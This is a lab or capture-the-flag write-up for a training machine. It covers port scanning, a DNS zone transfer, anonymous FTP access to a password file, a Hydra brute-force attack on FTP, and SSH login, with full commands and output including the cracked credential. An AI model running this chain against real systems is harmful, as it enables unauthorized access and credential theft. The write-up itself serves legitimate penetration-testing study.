Attacking Common Services - Medium

The challenge in this section lies in the luck factor of discovering the port that will allow you to progress and complete the section so if you fail to identify all 6 open ports during the scanning phase you may need to restart the machine as i did several times until it eventually worked or you can attempt to interact manually with the missing port to proceed.

Hints:

1- Find 6 open ports.

2- Utilize default credentials to log in to a service and obtain a file containing passwords.

3- Perform a brute-force attack on a service using the compromised file.

4- Utilize these credentials to retrieve the flag.

Initially i used Nmap without scanning all ports but i found nothing of interest so as usual when initial scans yield no significant results it's advisable to scan all ports. Therefore i employed Rustscan to perform a comprehensive scan of all ports. While Rustscan is fast but it's not always accurate so it's recommended to complement the scan with Nmap for thoroughness.

 rustscan -a 10.129.201.127 --range 1-65535
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.129.201.127:22
Open 10.129.201.127:53
Open 10.129.201.127:110
Open 10.129.201.127:30021

And now i will use Nmap to scan all ports and i recommend using the following arguments with Nmap for fast and accurate scanning of all ports

sudo nmap -p- --min-rate 20000 --stats-every 50s 10.129.106.78 -sS -vvv -Pn -
Completed SYN Stealth Scan at 09:57, 27.95s elapsed (65535 total ports)
Nmap scan report for 10.129.106.78
Host is up, received user-set (7.9s latency).
Scanned at 2024-04-04 09:56:50 EDT for 28s
Not shown: 45157 filtered tcp ports (no-response), 20372 closed tcp ports (reset)
PORT      STATE SERVICE     REASON
22/tcp    open  ssh         syn-ack ttl 63
53/tcp    open  domain      syn-ack ttl 63
110/tcp   open  pop3        syn-ack ttl 63
995/tcp   open  pop3s       syn-ack ttl 63
2121/tcp  open  ccproxy-ftp syn-ack ttl 63
30021/tcp open  unknown     syn-ack ttl 63

So, when used together, --min-rate 10000 --stats-every 50s would instruct Nmap to scan at a minimum rate of 10,000 packets per second and provide a status update every 50 seconds. This can help make the scan faster and more efficient, especially for large scans.

Let's test the 'transfer zone' functionality on that DNS server. 

dig AXFR @10.129.201.127 inlanefreight.htb

; <<>> DiG 9.19.17-2~kali1-Kali <<>> AXFR @10.129.201.127 inlanefreight.htb
; (1 server found)
;; global options: +cmd
inlanefreight.htb.      604800  IN      SOA     inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb.      604800  IN      NS      ns.inlanefreight.htb.
app.inlanefreight.htb.  604800  IN      A       10.129.200.5
dc1.inlanefreight.htb.  604800  IN      A       10.129.100.10
dc2.inlanefreight.htb.  604800  IN      A       10.129.200.10
int-ftp.inlanefreight.htb. 604800 IN    A       127.0.0.1
int-nfs.inlanefreight.htb. 604800 IN    A       10.129.200.70
ns.inlanefreight.htb.   604800  IN      A       127.0.0.1
un.inlanefreight.htb.   604800  IN      A       10.129.200.142
ws1.inlanefreight.htb.  604800  IN      A       10.129.200.101
ws2.inlanefreight.htb.  604800  IN      A       10.129.200.102
wsus.inlanefreight.htb. 604800  IN      A       10.129.200.80
inlanefreight.htb.      604800  IN      SOA     inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800

We will retrieve these subdomains, but if we perform the same action 'transfer zone' we won't find anything special so let's attempt to connect to the last FTP server using default credentials.

ftp 10.129.201.127 30021
Connected to 10.129.201.127.
220 ProFTPD Server (Internal FTP) [10.129.201.127]
Name (10.129.201.127:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||38341|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 ftp      ftp          4096 Apr 18  2022 simon
226 Transfer complete
ftp> cd simon
250 CWD command successful
ftp> dir
229 Entering Extended Passive Mode (|||46356|)
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 ftp      ftp           153 Apr 18  2022 mynotes.txt
226 Transfer complete
ftp> get mynotes.txt
local: mynotes.txt remote: mynotes.txt
229 Entering Extended Passive Mode (|||20176|)
150 Opening BINARY mode data connection for mynotes.txt (153 bytes)
100% |***********************************************************************|   153        3.09 KiB/s    00:00 ETA
226 Transfer complete
153 bytes received in 00:04 (0.03 KiB/s)
ftp> byte
?Invalid command.
ftp> exit
421 Idle timeout (600 seconds): closing control connection

We obtained 'mynotes.txt' which contains passwords. We will utilize these passwords to conduct a brute-force attack on the second FTP server.

hydra -l simon -P ./mynotes.txt ftp://10.129.201.127:2121/ -vV
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-04 06:15:56
[DATA] max 8 tasks per 1 server, overall 8 tasks, 8 login tries (l:1/p:8), ~1 try per task
[DATA] attacking ftp://10.129.201.127:2121/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 10.129.201.127 - login "simon" - pass "234987123948729384293" - 1 of 8 [child 0] (0/0)
[ATTEMPT] target 10.129.201.127 - login "simon" - pass "+23358093845098" - 2 of 8 [child 1] (0/0)
[ATTEMPT] target 10.129.201.127 - login "simon" - pass "ThatsMyBigDog" - 3 of 8 [child 2] (0/0)
[ATTEMPT] target 10.129.201.127 - login "simon" - pass "Rock!ng#May" - 4 of 8 [child 3] (0/0)
[ATTEMPT] target 10.129.201.127 - login "simon" - pass "Puuuuuh7823328" - 5 of 8 [child 4] (0/0)
[ATTEMPT] target 10.129.201.127 - login "simon" - pass "8Ns8j1b!23hs4921smHzwn" - 6 of 8 [child 5] (0/0)
[ATTEMPT] target 10.129.201.127 - login "simon" - pass "237oHs71ohls18H127!!9skaP" - 7 of 8 [child 6] (0/0)
[ATTEMPT] target 10.129.201.127 - login "simon" - pass "238u1xjn1923nZGSb261Bs81" - 8 of 8 [child 7] (0/0)
[STATUS] attack finished for 10.129.201.127 (waiting for children to complete tests)
[2121][ftp] host: 10.129.201.127   login: simon   password: 8Ns8j1b!23hs4921smHzwn
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-04 06:16:18

And we retrieved the password 'simon' so now let's connect to the FTP server using this credential.

ftp 10.129.201.127 2121              
Connected to 10.129.201.127.
220 ProFTPD Server (InlaneFTP) [10.129.201.127]
Name (10.129.201.127:kali): simon
331 Password required for simon
Password: 
230 User simon logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||57421|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 root     root           29 Apr 20  2022 flag.txt
drwxrwxr-x   3 simon    simon        4096 Apr 18  2022 Maildir
226 Transfer complete
ftp> cd Maildir
250 CWD command successful
ftp> dir
229 Entering Extended Passive Mode (|||64846|)
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 simon    simon         452 Apr 18  2022 dovecot.list.index.log
-rw-rw-r--   1 simon    simon           8 Apr 18  2022 dovecot-uidvalidity
-r--r--r--   1 simon    simon           0 Apr 18  2022 dovecot-uidvalidity.625dd61f
226 Transfer complete
ftp> bye
221 Goodbye.

we can read the flag or connecting over ssh

ssh [email protected]
The authenticity of host '10.129.201.127 (10.129.201.127)' can't be established.
ED25519 key fingerprint is SHA256:HfXWue9Dnk+UvRXP6ytrRnXKIRSijm058/zFrj/1LvY.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:16: [hashed name]
    ~/.ssh/known_hosts:18: [hashed name]
    ~/.ssh/known_hosts:19: [hashed name]
    ~/.ssh/known_hosts:20: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.201.127' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-107-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 04 Apr 2024 10:19:26 AM UTC

  System load:  0.15               Processes:               222
  Usage of /:   16.7% of 13.72GB   Users logged in:         0
  Memory usage: 12%                IPv4 address for ens160: 10.129.201.127
  Swap usage:   0%

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

No mail.
Last login: Wed Apr 20 14:32:33 2022 from 10.10.14.20
simon@lin-medium:~$ dir
flag.txt  Maildir
PreviousAttacking Common Services - EasyNextAttacking Common Services - Hard

Last updated

Was this helpful?